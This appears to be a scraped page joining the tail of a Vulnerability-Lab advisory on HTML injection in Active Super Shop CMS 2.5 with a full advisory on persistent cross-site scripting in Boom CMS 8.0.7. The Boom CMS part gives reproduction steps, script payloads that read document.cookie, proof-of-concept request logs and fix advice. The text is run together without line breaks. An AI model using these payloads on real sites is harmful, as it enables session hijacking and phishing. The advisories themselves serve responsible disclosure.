--- PoC Session Logs (POST) ---  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html, */*; q=0.01  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680  
Content-Length: 902  
Origin:https://assm_cms.localhost:8080  
Connection: keep-alive  
Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1  
-  
POST: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: keep-alive

Reference(s):  
https://assm_cms.localhost:8080/shop/  
https://assm_cms.localhost:8080/shop/admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/

Solution - Fix & Patch:  
=======================  
Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver.

Security Risk:  
==============  
The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Active Super Shop CMS 2.5 HTML Injection

Boom CMS version 8.0.7 suffers from a cross site scripting vulnerability.

    Document Title:===============Boom CMS v8.0.7 - Cross Site Scripting VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2274Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2274Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes lifeeasy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.It gives editors control but doesn't require any technical knowledge.(Copy of the Homepage:https://www.boomcms.net/boom-boom  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.Affected Product(s):====================UXB LondonProduct: Boom v8.0.7 - Content Management System (Web-Application)Vulnerability Disclosure Timeline:==================================2022-07-24: Researcher Notification & Coordination (Security Researcher)2022-07-25: Vendor Notification (Security Department)2023-**-**: Vendor Response/Feedback (Security Department)2023-**-**: Vendor Fix/Patch (Service Developer Team)2023-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (User Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromisebrowser to web-application requests from the application-side.The vulnerability is located in the input fields of the album title and album description in the asset-manager module.Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parsethe content by usage of a backslash. Thus does not have any impact to inject own maliciousjava-scripts because of its only performed for double- and single-quotes to prevent sql injections.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistentexternal redirects to malicious source and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Module(s):[+] assets-manager (album)Vulnerable Function(s):[+] addVulnerable Parameter(s):[+] title[+] descriptionAffected Module(s):[+] Frontend (Albums)[+] Backend (Albums Assets)Proof of Concept (PoC):=======================The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Manual steps to reproduce the vulnerability ...1. Login to the application as restricted user2. Create a new album3. Inject a test script code payload to title and description4. Save the request5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution6. Successful reproduce of the persistent cross site web vulnerability!Payload(s):><script>alert(document.cookie)</script><div style=1<a onmouseover=alert(document.cookie)>test</a>--- PoC Session Logs (Inject) ---https://localhost:8000/boomcms/album/35Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/jsonX-Requested-With: XMLHttpRequestContent-Length: 263Origin:https://localhost:8000Connection: keep-aliveReferer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Sec-Fetch-Site: same-origin{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>","slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by":null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}-PUT: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie: Max-Age=7200; path=/Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;Max-Age=7200; path=/; httponlyContent-Length: 242Connection: Keep-AliveContent-Type: application/json-https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;-GET: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie:Vary: Accept-EncodingContent-Length: 7866Connection: Keep-AliveContent-Type: text/html; charset=UTF-8-Vulnerable Source: asset-manager/albums/[ID]<li data-album="36">         <a href="#albums/20">             <div>                 <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>                 <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>                 <p class='count'><span>0</span> assets</p>             </div>         </a>     </li></iframe></p></div></a></li></ul></div></div>         </div>         <div id="b-assets-view-asset-container"></div>         <div id="b-assets-view-selection-container"></div>         <div id="b-assets-view-album-container"><div><div id="b-assets-view-album">         <div class="heading">             <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>             <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>         </div>Solution - Fix & Patch:=======================The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.Security Risk:==============The security risk of the persistent input validation web vulnerability in the application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tag

#windows